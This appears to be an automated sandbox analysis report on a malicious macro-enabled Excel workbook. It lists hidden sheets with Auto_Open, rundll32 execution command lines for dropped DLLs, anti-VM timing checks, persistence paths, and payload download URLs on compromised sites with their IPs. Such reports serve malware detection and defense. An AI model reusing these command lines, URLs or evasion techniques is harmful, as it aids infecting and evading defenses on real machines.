    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019AAF3
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001868F2
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001876EE
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019E31F
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00181914
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018610E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00197900
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00198103
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00193158
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B354
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019E554
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019DD54
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00182756
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00192B4A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00197D4C
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019114E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019AF4E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00182D46
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00198D7C
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018A17E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018AD68
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00184D6B
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00187361
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00192963
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00195198
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00187990
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018ED92
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019A797
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00185D88
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00187582
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019B587
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019E9BB
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001833B5
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B7B7
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019F1AF
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0019CFA1
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018EBA2
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00196DA4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001935DB
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00194BDA
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018E3C6
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001975F1
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018F1F6
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018FDE3
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001831E4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018DBE7
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E445900
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E446530
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E452C20
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E474CE0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E461C80
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E45FC91
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E442C90
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E46AA20
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E46FB69
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E474BB3
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44E660
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E45C25A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4712EC
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E449320
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E45C032
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E454EB0 appears 49 times
    Source: CC15.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk2
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk5
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk1
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk7
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: EFEWF
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk3
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk4
    Source: sin t#U00edtulo_0212.xlsmMacro extractor: Sheet name: Buk6
    Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
    Source: sin t#U00edtulo_0212.xlsmVirustotal: Detection: 22%
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$sin t#U00edtulo_0212.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD9AB.tmpJump to behavior
    Source: classification engineClassification label: mal100.expl.evad.winXLSM@8/7@2/2
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44AEB0 CoCreateInstance,OleRun,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E44DC50 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,
    Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: sin t#U00edtulo_0212.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: CC15.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E454F00 push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E476451 push ecx; ret
    Source: besta.ocx.0.drStatic PE information: real checksum: 0x72da1 should be: 0x75752
    Source: Z8LJs4fFM8[1].dll.0.drStatic PE information: real checksum: 0x72da1 should be: 0x75752
    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\besta.ocxJump to dropped file

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Nrenernv\nnave.jwm:Zone.Identifier read attributes | delete
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E446570 second address: 000000006E4465AB instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000F8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007F3180DA6CC7h 0x0000000e mov dword ptr [esp+14h], 0B8FEA98h 0x00000016 rdtscp
    Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006E447835 second address: 000000006E447863 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F3180BCE7B1h 0x0000000a mov ebx, 05F1FEE1h 0x0000000f rdtscp
    Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy)Jump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743 rdtsc
    Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 6.5 %
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E46B531 FindFirstFileExA,
    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E456FA9 IsDebuggerPresent,OutputDebugStringW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E46C928 GetProcessHeap,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E6743 rdtsc
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018DB4C mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E446530 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E446530 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E464E12 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4479C0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E457254 mov esi, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E46B306 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E454D87 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E45453A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E45D314 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
    Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E454BA6 cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E454F17 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection12Masquerading131OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery13Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Information Discovery125SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    sin t#U00edtulo_0212.xlsm23%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    3.2.rundll32.exe.6c01d8.1.unpack100%AviraHEUR/AGEN.1110387Download File
    3.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1110387Download File

    Domains

    SourceDetectionScannerLabelLink
    www.duoyuhudong.cn3%VirustotalBrowse
    sadabahar.com.np2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://schemas.openformatrg/drawml/2006/spreadsheetD0%Avira URL Cloudsafe
    http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI0%Avira URL Cloudsafe
    http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
    http://www.duoyuhudong.cn/wp-content/we8xi/ooC:100%Avira URL Cloudmalware
    http://sadabahar.com.np/wp-inclu0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://sadabahar.com.np/wp-i0%Avira URL Cloudsafe
    http://schemas.open0%URL Reputationsafe
    http://sadabahar.com.n0%Avira URL Cloudsafe
    http://www.duoyuhudong.cn/wp-content/we8xi/T100%Avira URL Cloudmalware
    http://sadabahar.c0%Avira URL Cloudsafe
    http://www.duoyuhudong.cn/wp-content/we8xi/R100%Avira URL Cloudmalware
    http://sadabahar.com0%Avira URL Cloudsafe
    http://sadabahar.co0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad0%Avira URL Cloudsafe
    http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
    http://www.duoyuhudong.cn/wp-content/we8xi/100%Avira URL Cloudmalware
    http://sadabahar.com.np/wp-includes/pUMqITCt83a/0%Avira URL Cloudsafe
    http://sadabahar.com.np/w0%Avira URL Cloudsafe
    http://sadabahar.com.np/wp-inc0%Avira URL Cloudsafe
    http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    www.duoyuhudong.cn
    47.96.4.95
    truefalseunknown
    sadabahar.com.np
    194.233.67.242
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://www.duoyuhudong.cn/wp-content/we8xi/true
    • Avira URL Cloud: malware
    unknown
    http://sadabahar.com.np/wp-includes/pUMqITCt83a/false
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpfalse
      high
      http://investor.msn.comEXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpfalse
          high
          http://schemas.openformatrg/drawml/2006/spreadsheetDEXCEL.EXE, 00000000.00000002.763332521.0000000007846000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqIEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.openformatrg/package/2006/content-tEXCEL.EXE, 00000000.00000002.763307650.0000000007716000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.duoyuhudong.cn/wp-content/we8xi/ooC:EXCEL.EXE, 00000000.00000002.750052025.000000000051C000.00000004.00000020.sdmptrue
          • Avira URL Cloud: malware
          unknown
          http://sadabahar.com.np/wp-incluEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.759571623.0000000005177000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.587109515.0000000002087000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.750147799.0000000002087000.00000002.00020000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmpfalse
            high
            http://sadabahar.com.np/wp-iEXCEL.EXE, 00000000.00000002.762999332.0000000007295000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
